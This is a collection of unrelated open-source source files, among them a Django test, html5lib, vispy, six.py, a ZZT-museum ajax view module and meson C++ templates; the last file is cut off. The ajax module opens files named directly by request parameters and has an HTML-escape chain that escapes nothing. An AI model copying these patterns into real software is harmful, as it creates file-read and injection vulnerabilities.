content = response.content.replace("foo(", "").replace(");", "")
self.assertEqual(json.loads(content)["email"], USER_EMAIL)
response = client.get(
"/api/email_json?callback=foo",
{},
HTTP_AUTHORIZATION="Bearer !!!%s" % token)
content = response.content.replace("foo(", "").replace(");", "")
self.assertEqual(response.status_code, 200)
self.assertTrue("error" in json.loads(content))
| mit |
ademuk/django-oscar | sites/demo/apps/offers.py | 33 | 1268 | from oscar.apps.offer import models
class AlphabetRange(object):
name = "Products that start with D"
def contains_product(self, product):
return product.title.startswith('D')
def num_products(self):
return None
class BasketOwnerCalledBarry(models.Condition):
name = "User must be called barry"
class Meta:
proxy = True
def is_satisfied(self, basket):
if not basket.owner:
return False
return basket.owner.first_name.lower() == 'barry'
def can_apply_condition(self, product):
return False
def consume_items(self, basket, affected_lines):
return
class ChangesOwnerName(models.Benefit):
class Meta:
proxy = True
def apply(self, basket, condition, offer=None):
condition.consume_items(basket, ())
return models.PostOrderAction(
"You will have your name changed to Barry!")
def apply_deferred(self, basket, order, application):
if basket.owner:
basket.owner.first_name = "Barry"
basket.owner.save()
return "Name changed to Barry!"
return "We tried to apply benefit but couldn't"
@property
def description(self):
return "Changes owners name"
| bsd-3-clause |
mdublin/Brightcove-Dynamic-Ingest-App | ENV/lib/python2.7/site-packages/pip/_vendor/html5lib/treebuilders/dom.py | 920 | 8469 | from __future__ import absolute_import, division, unicode_literals
from xml.dom import minidom, Node
import weakref
from . import _base
from .. import constants
from ..constants import namespaces
from ..utils import moduleFactoryFactory
def getDomBuilder(DomImplementation):
Dom = DomImplementation
class AttrList(object):
def __init__(self, element):
self.element = element
def __iter__(self):
return list(self.element.attributes.items()).__iter__()
def __setitem__(self, name, value):
self.element.setAttribute(name, value)
def __len__(self):
return len(list(self.element.attributes.items()))
def items(self):
return [(item[0], item[1]) for item in
list(self.element.attributes.items())]
def keys(self):
return list(self.element.attributes.keys())
def __getitem__(self, name):
return self.element.getAttribute(name)
def __contains__(self, name):
if isinstance(name, tuple):
raise NotImplementedError
else:
return self.element.hasAttribute(name)
class NodeBuilder(_base.Node):
def __init__(self, element):
_base.Node.__init__(self, element.nodeName)
self.element = element
namespace = property(lambda self: hasattr(self.element, "namespaceURI")
and self.element.namespaceURI or None)
def appendChild(self, node):
node.parent = self
self.element.appendChild(node.element)
def insertText(self, data, insertBefore=None):
text = self.element.ownerDocument.createTextNode(data)
if insertBefore:
self.element.insertBefore(text, insertBefore.element)
else:
self.element.appendChild(text)
def insertBefore(self, node, refNode):
self.element.insertBefore(node.element, refNode.element)
node.parent = self
def removeChild(self, node):
if node.element.parentNode == self.element:
self.element.removeChild(node.element)
node.parent = None
def reparentChildren(self, newParent):
while self.element.hasChildNodes():
child = self.element.firstChild
self.element.removeChild(child)
newParent.element.appendChild(child)
self.childNodes = []
def getAttributes(self):
return AttrList(self.element)
def setAttributes(self, attributes):
if attributes:
for name, value in list(attributes.items()):
if isinstance(name, tuple):
if name[0] is not None:
qualifiedName = (name[0] + ":" + name[1])
else:
qualifiedName = name[1]
self.element.setAttributeNS(name[2], qualifiedName,
value)
else:
self.element.setAttribute(
name, value)
attributes = property(getAttributes, setAttributes)
def cloneNode(self):
return NodeBuilder(self.element.cloneNode(False))
def hasContent(self):
return self.element.hasChildNodes()
def getNameTuple(self):
if self.namespace is None:
return namespaces["html"], self.name
else:
return self.namespace, self.name
nameTuple = property(getNameTuple)
class TreeBuilder(_base.TreeBuilder):
def documentClass(self):
self.dom = Dom.getDOMImplementation().createDocument(None, None, None)
return weakref.proxy(self)
def insertDoctype(self, token):
name = token["name"]
publicId = token["publicId"]
systemId = token["systemId"]
domimpl = Dom.getDOMImplementation()
doctype = domimpl.createDocumentType(name, publicId, systemId)
self.document.appendChild(NodeBuilder(doctype))
if Dom == minidom:
doctype.ownerDocument = self.dom
def elementClass(self, name, namespace=None):
if namespace is None and self.defaultNamespace is None:
node = self.dom.createElement(name)
else:
node = self.dom.createElementNS(namespace, name)
return NodeBuilder(node)
def commentClass(self, data):
return NodeBuilder(self.dom.createComment(data))
def fragmentClass(self):
return NodeBuilder(self.dom.createDocumentFragment())
def appendChild(self, node):
self.dom.appendChild(node.element)
def testSerializer(self, element):
return testSerializer(element)
def getDocument(self):
return self.dom
def getFragment(self):
return _base.TreeBuilder.getFragment(self).element
def insertText(self, data, parent=None):
data = data
if parent != self:
_base.TreeBuilder.insertText(self, data, parent)
else:
# HACK: allow text nodes as children of the document node
if hasattr(self.dom, '_child_node_types'):
if Node.TEXT_NODE not in self.dom._child_node_types:
self.dom._child_node_types = list(self.dom._child_node_types)
self.dom._child_node_types.append(Node.TEXT_NODE)
self.dom.appendChild(self.dom.createTextNode(data))
implementation = DomImplementation
name = None
def testSerializer(element):
element.normalize()
rv = []
def serializeElement(element, indent=0):
if element.nodeType == Node.DOCUMENT_TYPE_NODE:
if element.name:
if element.publicId or element.systemId:
publicId = element.publicId or ""
systemId = element.systemId or ""
rv.append("""|%s<!DOCTYPE %s "%s" "%s">""" %
(' ' * indent, element.name, publicId, systemId))
else:
rv.append("|%s<!DOCTYPE %s>" % (' ' * indent, element.name))
else:
rv.append("|%s<!DOCTYPE >" % (' ' * indent,))
elif element.nodeType == Node.DOCUMENT_NODE:
rv.append("#document")
elif element.nodeType == Node.DOCUMENT_FRAGMENT_NODE:
rv.append("#document-fragment")
elif element.nodeType == Node.COMMENT_NODE:
rv.append("|%s<!-- %s -->" % (' ' * indent, element.nodeValue))
elif element.nodeType == Node.TEXT_NODE:
rv.append("|%s\"%s\"" % (' ' * indent, element.nodeValue))
else:
if (hasattr(element, "namespaceURI") and
element.namespaceURI is not None):
name = "%s %s" % (constants.prefixes[element.namespaceURI],
element.nodeName)
else:
name = element.nodeName
rv.append("|%s<%s>" % (' ' * indent, name))
if element.hasAttributes():
attributes = []
for i in range(len(element.attributes)):
attr = element.attributes.item(i)
name = attr.nodeName
value = attr.value
ns = attr.namespaceURI
if ns:
name = "%s %s" % (constants.prefixes[ns], attr.localName)
else:
name = attr.nodeName
attributes.append((name, value))
for name, value in sorted(attributes):
rv.append('|%s%s="%s"' % (' ' * (indent + 2), name, value))
indent += 2
for child in element.childNodes:
serializeElement(child, indent)
serializeElement(element, 0)
return "\n".join(rv)
return locals()
# The actual means to get a module!
getDomModule = moduleFactoryFactory(getDomBuilder)
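# Illustrative usage sketch (assumes html5lib's public entry point, which
# lives outside this module):
#   import html5lib
#   document = html5lib.parse("<p>Hello</p>", treebuilder="dom")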
| mit |
drufat/vispy | examples/demo/gloo/galaxy/galaxy_simulation.py | 18 | 7753 | # -*- coding: utf-8 -*-
# vispy: testskip
# -----------------------------------------------------------------------------
# A Galaxy Simulator based on the density wave theory
# (c) 2012 Ingo Berg
#
# Simulating a Galaxy with the density wave theory
# http://beltoforion.de/galaxy/galaxy_en.html
#
# Python version (c) 2014 Nicolas P. Rougier
# -----------------------------------------------------------------------------
import math
import numpy as np
class Galaxy(object):
""" Galaxy simulation using the density wave theory """
def __init__(self, n=20000):
""" Initialize galaxy """
# Eccentricity of the innermost ellipse
self._inner_eccentricity = 0.8
# Eccentricity of the outermost ellipse
self._outer_eccentricity = 1.0
# Velocity at the innermost core in km/s
self._center_velocity = 30
# Velocity at the core edge in km/s
self._inner_velocity = 200
# Velocity at the edge of the disk in km/s
self._outer_velocity = 300
# Angular offset per parsec
self._angular_offset = 0.019
# Inner core radius
self._core_radius = 6000
# Galaxy radius
self._galaxy_radius = 15000
# The radius after which all density waves must have circular shape
self._distant_radius = 0
# Distribution of stars
self._star_distribution = 0.45
# Angular velocity of the density waves
self._angular_velocity = 0.000001
# Number of stars
self._stars_count = n
# Number of dust particles
self._dust_count = int(self._stars_count * 0.75)
# Number of H-II regions
self._h2_count = 200
# Particles
dtype = [('theta', np.float32, 1),
('velocity', np.float32, 1),
('angle', np.float32, 1),
('m_a', np.float32, 1),
('m_b', np.float32, 1),
('size', np.float32, 1),
('type', np.float32, 1),
('temperature', np.float32, 1),
('brightness', np.float32, 1),
('position', np.float32, 2)]
n = self._stars_count + self._dust_count + 2*self._h2_count
self._particles = np.zeros(n, dtype=dtype)
i0 = 0
i1 = i0 + self._stars_count
self._stars = self._particles[i0:i1]
self._stars['size'] = 3.
self._stars['type'] = 0
i0 = i1
i1 = i0 + self._dust_count
self._dust = self._particles[i0:i1]
self._dust['size'] = 64
self._dust['type'] = 1
i0 = i1
i1 = i0 + self._h2_count
self._h2a = self._particles[i0:i1]
self._h2a['size'] = 0
self._h2a['type'] = 2
i0 = i1
i1 = i0 + self._h2_count
self._h2b = self._particles[i0:i1]
self._h2b['size'] = 0
self._h2b['type'] = 3
def __len__(self):
""" Number of particles """
if self._particles is not None:
return len(self._particles)
return 0
def __getitem__(self, key):
""" x.__getitem__(y) <==> x[y] """
if self._particles is not None:
return self._particles[key]
return None
def reset(self, rad, radCore, deltaAng,
ex1, ex2, sigma, velInner, velOuter):
# Initialize parameters
# ---------------------
self._inner_eccentricity = ex1
self._outer_eccentricity = ex2
self._inner_velocity = velInner
self._outer_velocity = velOuter
self._angular_offset = deltaAng
self._core_radius = radCore
self._galaxy_radius = rad
self._distant_radius = self._galaxy_radius * 2
self.m_sigma = sigma
# Initialize stars
# ----------------
stars = self._stars
R = np.random.normal(0, sigma, len(stars)) * self._galaxy_radius
stars['m_a'] = R
stars['angle'] = 90 - R * self._angular_offset
stars['theta'] = np.random.uniform(0, 360, len(stars))
stars['temperature'] = np.random.uniform(3000, 9000, len(stars))
stars['brightness'] = np.random.uniform(0.05, 0.25, len(stars))
stars['velocity'] = 0.000005
for i in range(len(stars)):
stars['m_b'][i] = R[i] * self.eccentricity(R[i])
# Initialize dust
# ---------------
dust = self._dust
X = np.random.uniform(0, 2*self._galaxy_radius, len(dust))
Y = np.random.uniform(-self._galaxy_radius, self._galaxy_radius,
len(dust))
R = np.sqrt(X*X+Y*Y)
dust['m_a'] = R
dust['angle'] = R * self._angular_offset
dust['theta'] = np.random.uniform(0, 360, len(dust))
dust['velocity'] = 0.000005
dust['temperature'] = 6000 + R/4
dust['brightness'] = np.random.uniform(0.01, 0.02)
for i in range(len(dust)):
dust['m_b'][i] = R[i] * self.eccentricity(R[i])
# Initialize H-II
# ---------------
h2a, h2b = self._h2a, self._h2b
X = np.random.uniform(-self._galaxy_radius, self._galaxy_radius,
len(h2a))
Y = np.random.uniform(-self._galaxy_radius, self._galaxy_radius,
len(h2a))
R = np.sqrt(X*X+Y*Y)
h2a['m_a'] = R
h2b['m_a'] = R + 1000
h2a['angle'] = R * self._angular_offset
h2b['angle'] = h2a['angle']
h2a['theta'] = np.random.uniform(0, 360, len(h2a))
h2b['theta'] = h2a['theta']
h2a['velocity'] = 0.000005
h2b['velocity'] = 0.000005
h2a['temperature'] = np.random.uniform(3000, 9000, len(h2a))
h2b['temperature'] = h2a['temperature']
h2a['brightness'] = np.random.uniform(0.005, 0.010, len(h2a))
h2b['brightness'] = h2a['brightness']
for i in range(len(h2a)):
h2a['m_b'][i] = R[i] * self.eccentricity(R[i])
h2b['m_b'] = h2a['m_b']
def update(self, timestep=100000):
""" Update simulation """
self._particles['theta'] += self._particles['velocity'] * timestep
P = self._particles
a, b = P['m_a'], P['m_b']
theta, beta = P['theta'], -P['angle']
alpha = theta * math.pi / 180.0
cos_alpha = np.cos(alpha)
sin_alpha = np.sin(alpha)
cos_beta = np.cos(beta)
sin_beta = np.sin(beta)
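# (a*cos_alpha, b*sin_alpha) is the point on an ellipse with semi-axes
# a and b at parameter alpha; the two lines below apply a standard 2-D
# rotation by beta to tilt each orbit.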
P['position'][:, 0] = a*cos_alpha*cos_beta - b*sin_alpha*sin_beta
P['position'][:, 1] = a*cos_alpha*sin_beta + b*sin_alpha*cos_beta
D = np.sqrt(((self._h2a['position'] -
self._h2b['position'])**2).sum(axis=1))
S = np.maximum(1, ((1000-D)/10) - 50)
self._h2a['size'] = 2.0*S
self._h2b['size'] = S/6.0
def eccentricity(self, r):
# Core region of the galaxy. The innermost part is round, with
# eccentricity increasing linearly towards the border of the core.
if r < self._core_radius:
return 1 + (r / self._core_radius) * (self._inner_eccentricity-1)
elif r > self._core_radius and r <= self._galaxy_radius:
a = self._galaxy_radius - self._core_radius
b = self._outer_eccentricity - self._inner_eccentricity
return self._inner_eccentricity + (r - self._core_radius) / a * b
# Eccentricity is slowly reduced to 1.
elif r > self._galaxy_radius and r < self._distant_radius:
a = self._distant_radius - self._galaxy_radius
b = 1 - self._outer_eccentricity
return self._outer_eccentricity + (r - self._galaxy_radius) / a * b
else:
return 1
| bsd-3-clause |
smistad/FAST | source/FAST/Examples/Python/extract_surface_mesh.py | 1 | 1229 | ## @example extract_surface_mesh.py
# This examples extract a surface mesh with over 3 million triangles from a CT volume
# using the Marching Cubes algorithm.
# It also shows how you can access the vertex and triangle data directly.
import fast
importer = fast.ImageFileImporter.New()
importer.setFilename(fast.Config.getTestDataPath() + "/CT/CT-Abdomen.mhd")
extraction = fast.SurfaceExtraction.New()
extraction.setInputConnection(importer.getOutputPort())
extraction.setThreshold(300)
mesh = extraction.updateAndGetOutputMesh()
access = mesh.getMeshAccess(fast.ACCESS_READ)
# Get size of mesh:
print('Mesh size (vertices, triangles)', mesh.getNrOfVertices(), mesh.getNrOfTriangles())
# Get the position of first vertex
print(access.getVertex(0).getPosition())
# Get endpoints (vertex indices) of triangle 0
print(access.getTriangle(0).getEndpoint1(), access.getTriangle(0).getEndpoint2(), access.getTriangle(0).getEndpoint3())
# Get all vertices and triangles as lists, this is slow if it is a big surface:
#vertices = access.getVertices()
#triangles = access.getTriangles()
renderer = fast.TriangleRenderer.New()
renderer.setInputData(mesh)
window = fast.SimpleWindow.New()
window.addRenderer(renderer)
window.start()
| bsd-2-clause |
shermanng10/superathletebuilder | env/lib/python2.7/site-packages/pip/_vendor/requests/packages/urllib3/packages/six.py | 2375 | 11628 | """Utilities for writing code that runs on Python 2 and 3"""
#Copyright (c) 2010-2011 Benjamin Peterson
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import operator
import sys
import types
__author__ = "Benjamin Peterson <[email protected]>"
__version__ = "1.2.0" # Revision 41c74fef2ded
# True if we are running on Python 3.
PY3 = sys.version_info[0] == 3
if PY3:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
MAXSIZE = sys.maxsize
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
if sys.platform.startswith("java"):
# Jython always uses 32 bits.
MAXSIZE = int((1 << 31) - 1)
else:
# It's possible to have sizeof(long) != sizeof(Py_ssize_t).
class X(object):
def __len__(self):
return 1 << 31
try:
len(X())
except OverflowError:
# 32-bit
MAXSIZE = int((1 << 31) - 1)
else:
# 64-bit
MAXSIZE = int((1 << 63) - 1)
del X
def _add_doc(func, doc):
"""Add documentation to a function."""
func.__doc__ = doc
def _import_module(name):
"""Import module, returning the module after the last dot."""
__import__(name)
return sys.modules[name]
class _LazyDescr(object):
def __init__(self, name):
self.name = name
def __get__(self, obj, tp):
result = self._resolve()
setattr(obj, self.name, result)
# This is a bit ugly, but it avoids running this again.
delattr(tp, self.name)
return result
class MovedModule(_LazyDescr):
def __init__(self, name, old, new=None):
super(MovedModule, self).__init__(name)
if PY3:
if new is None:
new = name
self.mod = new
else:
self.mod = old
def _resolve(self):
return _import_module(self.mod)
class MovedAttribute(_LazyDescr):
def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):
super(MovedAttribute, self).__init__(name)
if PY3:
if new_mod is None:
new_mod = name
self.mod = new_mod
if new_attr is None:
if old_attr is None:
new_attr = name
else:
new_attr = old_attr
self.attr = new_attr
else:
self.mod = old_mod
if old_attr is None:
old_attr = name
self.attr = old_attr
def _resolve(self):
module = _import_module(self.mod)
return getattr(module, self.attr)
class _MovedItems(types.ModuleType):
"""Lazy loading of moved objects"""
_moved_attributes = [
MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"),
MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"),
MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"),
MovedAttribute("map", "itertools", "builtins", "imap", "map"),
MovedAttribute("reload_module", "__builtin__", "imp", "reload"),
MovedAttribute("reduce", "__builtin__", "functools"),
MovedAttribute("StringIO", "StringIO", "io"),
MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("zip", "itertools", "builtins", "izip", "zip"),
MovedModule("builtins", "__builtin__"),
MovedModule("configparser", "ConfigParser"),
MovedModule("copyreg", "copy_reg"),
MovedModule("http_cookiejar", "cookielib", "http.cookiejar"),
MovedModule("http_cookies", "Cookie", "http.cookies"),
MovedModule("html_entities", "htmlentitydefs", "html.entities"),
MovedModule("html_parser", "HTMLParser", "html.parser"),
MovedModule("http_client", "httplib", "http.client"),
MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"),
MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"),
MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"),
MovedModule("cPickle", "cPickle", "pickle"),
MovedModule("queue", "Queue"),
MovedModule("reprlib", "repr"),
MovedModule("socketserver", "SocketServer"),
MovedModule("tkinter", "Tkinter"),
MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"),
MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"),
MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"),
MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"),
MovedModule("tkinter_tix", "Tix", "tkinter.tix"),
MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"),
MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"),
MovedModule("tkinter_colorchooser", "tkColorChooser",
"tkinter.colorchooser"),
MovedModule("tkinter_commondialog", "tkCommonDialog",
"tkinter.commondialog"),
MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"),
MovedModule("tkinter_font", "tkFont", "tkinter.font"),
MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"),
MovedModule("tkinter_tksimpledialog", "tkSimpleDialog",
"tkinter.simpledialog"),
MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"),
MovedModule("winreg", "_winreg"),
]
for attr in _moved_attributes:
setattr(_MovedItems, attr.name, attr)
del attr
moves = sys.modules[__name__ + ".moves"] = _MovedItems("moves")
def add_move(move):
"""Add an item to six.moves."""
setattr(_MovedItems, move.name, move)
def remove_move(name):
"""Remove item from six.moves."""
try:
delattr(_MovedItems, name)
except AttributeError:
try:
del moves.__dict__[name]
except KeyError:
raise AttributeError("no such move, %r" % (name,))
if PY3:
_meth_func = "__func__"
_meth_self = "__self__"
_func_code = "__code__"
_func_defaults = "__defaults__"
_iterkeys = "keys"
_itervalues = "values"
_iteritems = "items"
else:
_meth_func = "im_func"
_meth_self = "im_self"
_func_code = "func_code"
_func_defaults = "func_defaults"
_iterkeys = "iterkeys"
_itervalues = "itervalues"
_iteritems = "iteritems"
try:
advance_iterator = next
except NameError:
def advance_iterator(it):
return it.next()
next = advance_iterator
if PY3:
def get_unbound_function(unbound):
return unbound
Iterator = object
def callable(obj):
return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
else:
def get_unbound_function(unbound):
return unbound.im_func
class Iterator(object):
def next(self):
return type(self).__next__(self)
callable = callable
_add_doc(get_unbound_function,
"""Get the function out of a possibly unbound function""")
get_method_function = operator.attrgetter(_meth_func)
get_method_self = operator.attrgetter(_meth_self)
get_function_code = operator.attrgetter(_func_code)
get_function_defaults = operator.attrgetter(_func_defaults)
def iterkeys(d):
"""Return an iterator over the keys of a dictionary."""
return iter(getattr(d, _iterkeys)())
def itervalues(d):
"""Return an iterator over the values of a dictionary."""
return iter(getattr(d, _itervalues)())
def iteritems(d):
"""Return an iterator over the (key, value) pairs of a dictionary."""
return iter(getattr(d, _iteritems)())
if PY3:
def b(s):
return s.encode("latin-1")
def u(s):
return s
if sys.version_info[1] <= 1:
def int2byte(i):
return bytes((i,))
else:
# This is about 2x faster than the implementation above on 3.2+
int2byte = operator.methodcaller("to_bytes", 1, "big")
import io
StringIO = io.StringIO
BytesIO = io.BytesIO
else:
def b(s):
return s
def u(s):
return unicode(s, "unicode_escape")
int2byte = chr
import StringIO
StringIO = BytesIO = StringIO.StringIO
_add_doc(b, """Byte literal""")
_add_doc(u, """Text literal""")
if PY3:
import builtins
exec_ = getattr(builtins, "exec")
def reraise(tp, value, tb=None):
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
print_ = getattr(builtins, "print")
del builtins
else:
def exec_(code, globs=None, locs=None):
"""Execute code in a namespace."""
if globs is None:
frame = sys._getframe(1)
globs = frame.f_globals
if locs is None:
locs = frame.f_locals
del frame
elif locs is None:
locs = globs
exec("""exec code in globs, locs""")
exec_("""def reraise(tp, value, tb=None):
raise tp, value, tb
""")
def print_(*args, **kwargs):
"""The new-style print function."""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
_add_doc(reraise, """Reraise an exception.""")
def with_metaclass(meta, base=object):
"""Create a base class with a metaclass."""
return meta("NewBase", (base,), {})
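# Illustrative usage sketch (hypothetical classes):
#   class Meta(type):
#       pass
#   class MyClass(with_metaclass(Meta, object)):
#       pass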
| mit |
DrDos0016/z2 | museum_site/ajax.py | 1 | 3215 | from django.http import HttpResponse
from .models import *
from .common import *
import zipfile
import binascii
import base64
import os
def get_zip_file(request):
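# Serve a single member of a stored zip archive over HTTP. The query
# parameters below (letter, zip, filename, format, uploaded) select the
# archive directory, the archive itself, the member, and how its
# contents are rendered.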
letter = request.GET.get("letter")
zip = request.GET.get("zip")
filename = request.GET.get("filename", "")
format = request.GET.get("format", "auto")
ext = os.path.splitext(filename.lower())[1]
uploaded = request.GET.get("uploaded", "false")
if filename.find(".") == -1:
ext = ".txt"
if uploaded != "false":
letter = "uploaded"
try:
zip = zipfile.ZipFile(os.path.join(SITE_ROOT, "zgames", letter, zip))
file = zip.open(filename)
except Exception as error:
print(filename)
print(type(error))
print(error)
return HttpResponse(
"An error occurred, and the file could not be retreived."
)
if ext in ("", ".doc", ".txt", ".bat", ".cfg", ".nfo", ".dat", ".bas", ".deu", ".diz", ".c", ".ds_store", ".faq", ".frm", ".fyi", ".gud", ".h", ".hlp", ".lst", ".me", ".nfo", ".pas", ".reg", ".sol", ".zln", ".zml", ".zzl", ".zzm", ".135", ".1st", ".asm", ".bb", ".bin", ".chr", ".sdi", ".now"):
output = file.read()
if format == "auto" or format == "utf-8":
try:
output = output.decode("utf-8")
encoding = "utf-8"
except UnicodeDecodeError as e:
output = output.decode("cp437")
encoding = "cp437"
elif format == "cp437":
output = output.decode("cp437")
encoding = "cp437"
elif format == "hex":
output = "HEXADECIMAL"
encoding = "hex"
output = output.replace(
"&", "&"
).replace(
"<", "<"
).replace(
">", ">"
).replace(
" ", " "
).replace(
"\r\n", "<br>"
).replace(
"\r", "<br>"
).replace(
"\n", "<br>"
)
output = "<div class='text-file " + encoding + "'>" + output + "</div>"
return HttpResponse(output)
elif ext in (".hi", ".zzt", ".brd", ".mh", ".sav", ".szt"):
return HttpResponse(binascii.hexlify(file.read()))
elif ext in (".jpg", ".jpeg", ".bmp", ".gif", ".png", ".ico", ".avi"):
b64 = base64.b64encode(file.read())
return HttpResponse(b64)
elif ext in (".wav", ".mp3", ".ogg", ".mid", ".midi"):
response = HttpResponse(file.read())
if ext == ".wav":
response["Content-Type"] = "audio/wav wav"
elif ext == ".mp3":
response["Content-Type"] = "audio/mpeg mp3"
elif ext == ".ogg":
response["Content-Type"] = "audio/ogg ogg"
else: # Fallback
response["Content-Type"] = "application/octet-stream"
return response
else:
return HttpResponse("This file type is not currently supported for embedded content.")
def debug_file(request):
if not os.path.isfile("/var/projects/DEV"):
return HttpResponse("Not on production.")
file = open(request.GET.get("file"), "rb")
return HttpResponse(binascii.hexlify(file.read()))
| mit |
becm/meson | mesonbuild/templates/cpptemplates.py | 1 | 5439 | # Copyright 2019 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from mesonbuild.templates.sampleimpl import SampleImpl
import re
hello_cpp_template = '''#include <iostream>
#define PROJECT_NAME "{project_name}"
int main(int argc, char **argv) {{
if(argc != 1) {{
std::cout << argv[0] << "takes no arguments.\\n";
return 1;
}}
std::cout << "This is project " << PROJECT_NAME << ".\\n";
return 0;
}}
'''
hello_cpp_meson_template = '''project('{project_name}', 'cpp',
version : '{version}',
default_options : ['warning_level=3',
'cpp_std=c++14'])
exe = executable('{exe_name}', '{source_name}',
install : true)
test('basic', exe)
'''
lib_hpp_template = '''#pragma once
#if defined _WIN32 || defined __CYGWIN__
#ifdef BUILDING_{utoken}
#define {utoken}_PUBLIC __declspec(dllexport)
#else
#define {utoken}_PUBLIC __declspec(dllimport)
#endif
#else
#ifdef BUILDING_{utoken}
#define {utoken}_PUBLIC __attribute__ ((visibility ("default")))
#else
#define {utoken}_PUBLIC
#endif
#endif
namespace {namespace} {{
class {utoken}_PUBLIC {class_name} {{
public:
{class_name}();
int get_number() const;
private:
int number;
}};
}}
'''
lib_cpp_template = '''#include <{header_file}>
namespace {namespace} {{
{class_name}::{class_name}() {{
number = 6;
}}
int {class_name}::get_number() const {{
return number;
}}
}}
'''
lib_cpp_test_template = '''#include <{header_file}>
#include <iostream>
int main(int argc, char **argv) {{
if(argc != 1) {{
std::cout << argv[0] << " takes no arguments.\\n";
return 1;
}}
{namespace}::{class_name} c;
return c.get_number() != 6;
}}
'''
lib_cpp_meson_template = '''project('{project_name}', 'cpp',
version : '{version}',
default_options : ['warning_level=3', 'cpp_std=c++14'])
# These arguments are only used to build the shared library
# not the executables that use the library.
lib_args = ['-DBUILDING_{utoken}']
shlib = shared_library('{lib_name}', '{source_file}',
install : true,
cpp_args : lib_args,
gnu_symbol_visibility : 'hidden',
)
test_exe = executable('{test_exe_name}', '{test_source_file}',
link_with : shlib)
test('{test_name}', test_exe)
# Make this library usable as a Meson subproject.
{ltoken}_dep = declare_dependency(
include_directories: include_directories('.'),
link_with : shlib)
# Make this library usable from the system's
# package manager.
install_headers('{header_file}', subdir : '{header_dir}')
pkg_mod = import('pkgconfig')
pkg_mod.generate(
name : '{project_name}',
filebase : '{ltoken}',
description : 'Meson sample project.',
subdirs : '{header_dir}',
libraries : shlib,
version : '{version}',
)
'''
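# Illustrative rendering (added example, not part of the meson templates):
# the strings above are plain str.format() targets, so single-brace fields
# are substituted while doubled braces survive as literal braces in the
# generated C++/Meson sources.
_example_source = hello_cpp_template.format(project_name='demo')  # compilable C++ for a project named "demo"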
class CppProject(SampleImpl):
def __init__(self, options):
super().__init__()
self.name = options.name
self.version = options.version
def create_executable(self):
lowercase_token = re.sub(r'[^a-z0-9]', '_', self.name.lower())
source_name = lowercase_token + '.cpp'
open(source_name, 'w').write(hello_cpp_template.format(project_name=self.name))
open('meson.build', 'w').write(hello_cpp_meson_template.format(project_name=self.name,
exe_name=lowercase_token,
source_name=source_name,
version=self.version))
def create_library(self):
lowercase_token = re.sub(r'[^a-z0-9]', '_', self.name.lower())
uppercase_token = lowercase_token.upper()
class_name = uppercase_token[0] + lowercase_token[1:]
test_exe_name = lowercase_token + '_test'
namespace = lowercase_token
lib_hpp_name = lowercase_token + '.hpp'
lib_cpp_name = lowercase_token + '.cpp'
test_cpp_name = lowercase_token + '_test.cpp'
kwargs = {'utoken': uppercase_token,
'ltoken': lowercase_token,
'header_dir': lowercase_token,
'class_name': class_name,
'namespace': namespace,
'header_file': lib_hpp_name,
'source_file': lib_cpp_name,
'test_source_file': test_cpp_name,
'test_exe_name': test_exe_name,
'project_name': self.name,
'lib_name': lowercase_token,
'test_name': lowercase_token,
'version': self.version,
}
open(lib_hpp_name, 'w').write(lib_hpp_template.format(**kwargs))
